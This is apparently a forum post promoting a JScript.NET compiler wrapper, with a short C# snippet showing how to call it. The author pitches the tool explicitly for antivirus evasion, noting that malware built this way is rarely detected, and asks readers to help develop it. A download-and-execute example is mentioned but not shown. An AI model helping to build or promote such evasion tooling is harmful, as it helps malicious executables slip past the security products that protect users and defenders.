Have you heard about the CodeDOM compiler or the Ethernal Compiler class by Ethernal Five? This is pretty much like that except it allows you to compile the (not so much heard of) JScript.NET to make those kinds of assemblies. The assemblies built with JScript.NET do not share the same type of signatures that C# or VB.NET do, so not a lot of malware will be detected if you use it.
It's a work in progress, and hopefully with some collaboration with some of you, we can create something amazing. You can help by forking the gist and working on it from your end.
Here's an example of a JScript.NET code, it downloads putty.exe and executes it:
And here's some example usage of the JSC.NET Compiler
And you can get the source code of the compiler, or contribute to it on Github Gist

Code
var compiler = new JScriptCompiler();
var result = compiler.Compile("test.js", "out.exe");
if (result.Success == true) {
Console.WriteLine("Successfully compiled!");
}else {
Console.WriteLine("Failed! Errors displayed below");
foreach(var error in result.Errors) {
Console.WriteLine(error.Message);
}
